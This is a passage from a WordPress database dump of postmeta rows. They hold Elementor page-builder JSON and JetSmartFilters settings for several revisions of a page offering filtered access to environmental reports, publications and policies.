Date'),(28149,4063,'_date_period_start_end_enabled','true'),(28150,4063,'_date_period_format',''),(28151,4063,'_date_period_start_format',''),(28152,4063,'_date_period_separator',''),(28153,4063,'_date_period_end_format',''),(28154,4063,'_range_inputs_enabled','false'),(28155,4063,'_values_prefix',''),(28156,4063,'_values_suffix',''),(28157,4063,'_values_thousand_sep',''),(28158,4063,'_values_decimal_sep','.'),(28159,4063,'_values_decimal_num','0'),(28160,4063,'_source_min',''),(28161,4063,'_source_max',''),(28162,4063,'_source_step',''),(28163,4063,'_source_callback','0'),(28164,4063,'_use_exclude_include','0'),(28165,4063,'_data_exclude_include',''),(28166,4063,'_alphabet_behavior','checkbox'),(28167,4063,'_alphabet_radio_deselect','true'),(28168,4063,'_alphabet_options','A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z'),(28169,4063,'_query_var',''),(28170,4063,'_query_compare','equal'),(28171,4063,'license',''),(28172,4064,'_elementor_edit_mode','builder'),(28173,4064,'_elementor_template_type','wp-page'),(28174,4064,'_elementor_version','3.4.0'),(28175,4064,'_wp_page_template','default'),(28176,4064,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.702999999999999403144101961515843868255615234375},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.55499999999999971578290569595992565155029296875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28178,4064,'_elementor_pro_version','3.3.6'),(28180,4065,'_elementor_edit_mode','builder'),(28181,4065,'_elementor_template_type','wp-page'),(28182,4065,'_elementor_version','3.4.0'),(28183,4065,'_wp_page_template','default'),(28184,4065,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.702999999999999403144101961515843868255615234375},\"elements\":[],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.55499999999999971578290569595992565155029296875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38602,4930,'_elementor_css','a:6:{s:4:\"time\";i:1770868850;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(28186,4065,'_elementor_pro_version','3.3.6'),(28188,4066,'_elementor_edit_mode','builder'),(28189,4066,'_elementor_template_type','wp-page'),(28190,4066,'_elementor_version','3.4.0'),(28191,4066,'_wp_page_template','default'),(28192,4066,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":27.010000000000001563194018672220408916473388671875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":72.9899999999999948840923025272786617279052734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28194,4066,'_elementor_pro_version','3.3.6'),(28197,4067,'_elementor_edit_mode','builder'),(28198,4067,'_elementor_template_type','wp-page'),(28199,4067,'_elementor_version','3.4.0'),(28200,4067,'_wp_page_template','default'),(28201,4067,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":27.010000000000001563194018672220408916473388671875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":72.9899999999999948840923025272786617279052734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28203,4067,'_elementor_pro_version','3.3.6'),(28204,4068,'_elementor_edit_mode','builder'),(28205,4068,'_elementor_template_type','wp-page'),(28206,4068,'_elementor_version','3.4.0'),(28207,4068,'_wp_page_template','default'),(28208,4068,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":27.010000000000001563194018672220408916473388671875},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":72.9899999999999948840923025272786617279052734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28210,4068,'_elementor_pro_version','3.3.6'),(28211,4069,'_elementor_edit_mode','builder'),(28212,4069,'_elementor_template_type','wp-page'),(28213,4069,'_elementor_version','3.4.0'),(28214,4069,'_wp_page_template','default'),(28215,4069,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"50df923\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38601,68,'_elementor_css','a:6:{s:4:\"time\";i:1770865755;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(28217,4069,'_elementor_pro_version','3.3.6'),(28220,4070,'_elementor_edit_mode','builder'),(28221,4070,'_elementor_template_type','wp-page'),(28222,4070,'_elementor_version','3.4.0'),(28223,4070,'_wp_page_template','default'),(28224,4070,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related 